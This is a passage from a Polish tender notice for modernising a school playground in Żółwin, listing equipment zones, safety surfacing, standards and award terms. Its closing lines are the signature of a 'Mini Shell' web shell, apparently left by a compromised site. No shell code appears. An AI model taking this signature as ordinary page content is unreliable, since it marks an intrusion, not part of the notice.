Urządzenia powinny być wykonane w dominującej ich części z drewna klejonego z elementami z innych materiałów odpornych na warunki atmosferyczne, na stopach stalowych ocynkowanych, zakotwiczone w gruncie poprzez zabetonowanie.

2. Zamówienie w częściach 1 i 2 obejmuje także przygotowanie projektu zagospodarowania terenu na właściwych aktualnych mapach ewidencyjnych wraz z niezbędnymi załącznikami celem zgłoszenia placów zabaw do Starostwa Powiatowego w Pruszkowie. Zgłoszenia dokonuje wykonawca.
Place zabaw mają być przeznaczone dla dzieci w młodszym wieku szkolnym i dostosowane do ich potrzeb.
Przy każdym urządzeniu mają być zainstalowane czytelne tablice informacyjne pokazujące możliwości i sposób wykorzystania każdego urządzenia 
Regulamin określający zasady korzystania z placu zabaw musi spełniać wymogi programu Radosna Szkoła.

3. W celu potwierdzenia, że oferowane roboty i dostawy odpowiadają wymaganiom Zamawiającego Wykonawca załączy do oferty szczegółowy opis elementów wyposażenia placu zabaw wraz z ich kolorystyką (zgodnie z wytycznymi MEN)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.53.52.00-9, 45.11.27.23-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> modernizacja placu zabaw w Zespole Szkół w Żółwinie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zakres rzeczowy przedmiotu umowy obejmuje:
CZĘŚĆ NR 2: modernizacja placu zabaw w Zespole Szkół w Żółwinie pow. terenu ok. 280 m2
1.1. Przedmiot zamówienia należy wykonać zgodnie z wytycznymi Ministerstwa Edukacji Narodowej dotyczącymi programu rządowego Radosna Szkoła.
1.2. Wykonanie przedmiotu zamówienia zgodnie ze normą PN-EN-1176 i PN-EN-1177.
1.3. Planowane położenie:
Obszar przeznaczony na plac zabaw położony jest w części terenu szkoły: ograniczony z dwóch stron siatką ogrodzeniową, od zachodu graniczy z boiskiem do koszykówki / siatkówki o nawierzchni tartanowej, od południa bieżnią i piaskownicą do skoku w dal. Ma kształt czworokąta o wymiarach jak na rysunku. Całkowita powierzchnia - ok. 280 m2.  Porośnięty jest w całości trawą.
1.4. Położenie nawierzchni bezpiecznej pod urządzenia  spełniającej wymogi Polskich Norm gumowej lub piankowej amortyzujących upadek w kolorze pomarańczowym (pow. ok. 150m2) - połączenie nawierzchni bezpiecznych ścieżką  (komunikacja) w kolorze niebieskim typu tartan lub inną nawierzchnia syntetyczną (pow. ok. 20 m2) Nawierzchnie  zgodnie z wymaganiami programu Radosna Szkoła. Resztę terenu zagospodarować trawnikiem - pas zieleni min. 70 m2
1.5. Zakup, dostawa i montaż urządzeń: 
Wszystkie urządzenia mają umożliwiać bardziej prowadzenie z dziećmi zajęć ruchowych niż rekreację i zabawę.
Na placu planowane jest stworzenie 3 stref ćwiczeń: 
Obszar I   - Urządzenia do wykonywania przeplotów gimnastycznych tj. przeplotnia gimnastyczna
Obszar II  - Urządzenia do ćwiczenia równowagi i podciągania tj. zestaw gimnastyczny i ścieżka zdrowia
Obszar III - Urządzenia do wspinaczki - ściana wspinaczkowa łańcuchowa (system wspinania połączonych elementów).
 1) Obszar I - Urządzenia do wykonywania przeplotów gimnastycznych- tj. przeplotnia gimnastyczna
Zestaw zręcznościowy służący do wspinania i przeplatania złożony z min 3 elementów np.
przeplotnia pionowa w kształcie pajęczyny, przeplotnia linowa w kształcie siatki prostokątnej, komin linowy.
Elementy mogą być ze sobą połączone w linii prostej lub w postaci wieloboku (np. sześciokąta) typu małpi gaj, np. z  powtarzającymi się elementami wymienionymi powyżej. 
2) Obszar II - Urządzenia do ćwiczenia równowagi i podciągania: tj. zestaw gimnastyczny i ścieżka zdrowia
Pojedyncze elementy ułożone w kształt ścieżki do balansowania min 6 elementów (wieloboku lub łamanej otwartej) np.: równoważnia huśtawka, równoważnia na sprężynach, równoważnia pochylnia, ew. talerzowe schodki (belka z osadzonymi na nie metalowymi talerzykami na różnych wysokościach), ew. lina do balansowania, słupki do slalomu lub do wchodzenia i zeskoków, płotki do przeskoków.
Elementy do podciągania: min. 2  np. drążki akrobatyczne lub  kółka akrobatyczne np.  drabinka skośna.
3) Obszar III - Urządzenia do wspinaczki, tj. ściana wspinaczkowa łańcuchowa (system wspinania połączonych elementów).
Zestaw zręcznościowy służący do wspinania złożony z min 4 elementów: np. ścianka wspinaczkowa lub drabinka skośna wspinaczkowo-szczeblowa, drabinka gimnastyczna  podwójna, drabinka linowa , lina do wspinaczki.
3 elementy mogą być połączone w kształt linii łamanej a ścianka do wspinaczki np. jako oddzielny element.

1.6. tablica informacyjna z regulaminem zgodna z wymogami Programu Radosna Szkoła.
1.7. Wieszak na odzież wolnostojący lub ścianka z wieszakami.
1.8. Min 2 szt. ławeczek, kosz 1 szt.

Zgodnie z wytycznymi MEN sprzęt powinien posiadać co najmniej 3-letni okres gwarancji jakości i rękojmi za wady. Urządzenia powinny być wykonane z bezpiecznych i trwałych materiałów oraz spełniać wymogi Polskich Norm i warunków bezpieczeństwa, tj. posiadać stosowne certyfikaty bezpieczeństwa i dopuszczenia do stosowania w kontakcie z dziećmi,  wg norm EN-1176 i EN-1177.
Urządzenia powinny być wykonane w dominującej ich części z drewna klejonego lub metalu, stali z elementami z innych materiałów odpornych na warunki atmosferyczne, na stopach stalowych ocynkowanych, zakotwiczone w gruncie poprzez zabetonowanie.

2. Zamówienie w częściach 1 i 2 obejmuje także przygotowanie projektu zagospodarowania terenu na właściwych aktualnych mapach ewidencyjnych wraz z niezbędnymi załącznikami celem zgłoszenia placów zabaw do Starostwa Powiatowego w Pruszkowie. Zgłoszenia dokonuje wykonawca.
Place zabaw mają być przeznaczone dla dzieci w młodszym wieku szkolnym i dostosowane do ich potrzeb.
Przy każdym urządzeniu mają być zainstalowane czytelne tablice informacyjne pokazujące możliwości i sposób wykorzystania każdego urządzenia 
Regulamin określający zasady korzystania z placu zabaw musi spełniać wymogi programu Radosna Szkoła.

3. W celu potwierdzenia, że oferowane roboty i dostawy odpowiadają wymaganiom Zamawiającego Wykonawca załączy do oferty szczegółowy opis elementów wyposażenia placu zabaw wraz z ich kolorystyką (zgodnie z wytycznymi MEN)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.53.52.00-9, 45.11.27.23-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com